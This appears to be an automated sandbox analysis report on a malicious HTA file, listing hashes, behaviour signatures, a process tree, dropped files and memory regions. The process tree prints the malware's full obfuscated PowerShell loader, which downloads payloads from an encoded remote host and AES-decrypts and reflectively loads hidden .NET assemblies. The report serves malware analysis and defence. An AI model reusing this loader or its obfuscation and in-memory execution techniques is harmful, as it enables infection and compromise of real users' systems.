Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 · arch:x86 · image:win7-20240221-en · locale:en-us · os:windows7-x64 · system
  • submitted
    17-04-2024 01:33

General

  • Target

    609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta

  • Size

    12KB

  • MD5

    a76519720925437e61593d697c22d2c3

  • SHA1

    fd9e658d262708c746854082d8a00e9ff998ff95

  • SHA256

    609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61

  • SHA512

    8be920887fde3b309df0740568840254230990a0d26ae09340a37beafccaebe5b74f9feb776d0cfbcac13b40591892319d4bf2756cbb64d66e187b7483e9a71d

  • SSDEEP

    384:OSJ6w3wSSkOLjX30OxjnPC/0OOjHhw/SFfJ+RATJcJ/A4B4/JdNOJitAJ8tluNVe:OSJxgSoLjX3NxjnPC/NOjHhw/S9J+RAL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2984
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tNWGEJMu($ULFEPiGhOl, $hAwOwjHZ){[IO.File]::WriteAllBytes($ULFEPiGhOl, $hAwOwjHZ)};function PGKDesLMcrTbG($ULFEPiGhOl){if($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69334,69342,69342))) -eq $True){rundll32.exe $ULFEPiGhOl }elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69346,69349,69283))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ULFEPiGhOl}elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69343,69349,69339))) -eq $True){misexec /qn /i $ULFEPiGhOl}else{Start-Process $ULFEPiGhOl}};function oUMxzMjfRmyfuF($kRhMsCFPNneuPI){$bAYnlERprgsydxZhcb = New-Object (nknmvKToK @(69312,69335,69350,69280,69321,69335,69332,69301,69342,69339,69335,69344,69350));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hAwOwjHZ = $bAYnlERprgsydxZhcb.DownloadData($kRhMsCFPNneuPI);return $hAwOwjHZ};function nknmvKToK($seDVN){$yalEZGZTFwbDQOL=69234;$tpnuZBTtZIpg=$Null;foreach($KCBlEGmaNzzs in $seDVN){$tpnuZBTtZIpg+=[char]($KCBlEGmaNzzs-$yalEZGZTFwbDQOL)};return $tpnuZBTtZIpg};function jSMnCBtJT(){$RhDqJvMegLwjZOQ = $env:AppData + '\';$rQGmlBDswBs = $RhDqJvMegLwjZOQ + 'dbx.xlsx';If(Test-Path -Path $rQGmlBDswBs){Invoke-Item $rQGmlBDswBs;}Else{ $NvyoXyonhCMUvEQanD = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69334,69332,69354,69280,69354,69342,69349,69354));tNWGEJMu $rQGmlBDswBs $NvyoXyonhCMUvEQanD;Invoke-Item $rQGmlBDswBs;};$vILiVqGF = $RhDqJvMegLwjZOQ + 'gogis.bat'; if (Test-Path -Path $vILiVqGF){PGKDesLMcrTbG $vILiVqGF;}Else{ $TIaEiamfAp = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69337,69345,69337,69339,69349,69280,69332,69331,69350));tNWGEJMu $vILiVqGF 
$TIaEiamfAp;PGKDesLMcrTbG $vILiVqGF;};;;;}jSMnCBtJT;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2796
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 
6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1344
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1216

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      be71a7edabbae792c25dae4c11077bef

      SHA1

      d396477f0410608f0fbcee9b80354770a6db318c

      SHA256

      8c0ca0b14f3e2b661020fd9a50fcfa4f7118152aa7f56b5f2dca5fc1cffc100e

      SHA512

      69f41f99377c397008041f0ebe19688904813d67170ae58a02e14514f1725076f81557ee79c2f396e9eaaebaa250f17cf823b93f8a76c53243c7c84f0b64aff1

    • C:\Users\Admin\AppData\Roaming\dbx.xlsx

      Filesize

      10KB

      MD5

      034b9d3741bf082520555ec8b45fa875

      SHA1

      b61bbd3d22e803cf608e1ae7e0a5a5851934db49

      SHA256

      82bcb0ad710775944bd5d4702595abde2557a84d518d146d389ba58cc1dfcd11

      SHA512

      8f721ff1f69eb0881a43bbb540e8adfac8bf94509038e4b5d27282457b426902586e561528329918a12d42bf5b98c4b8f17b676090508a18898ceb6f12cd4eb9

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1216-48-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1216-49-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-50-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-36-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1216-37-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-35-0x0000000002870000-0x00000000028B0000-memory.dmp

      Filesize

      256KB

    • memory/1216-34-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-2-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-28-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-4-0x0000000072610000-0x0000000072BBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2668-5-0x0000000002570000-0x00000000025B0000-memory.dmp

      Filesize

      256KB

    • memory/2668-3-0x0000000002570000-0x00000000025B0000-memory.dmp

      Filesize

      256KB

    • memory/2796-47-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB

    • memory/2796-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2796-8-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB

    • memory/2796-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2796-55-0x000000006D5ED000-0x000000006D5F8000-memory.dmp

      Filesize

      44KB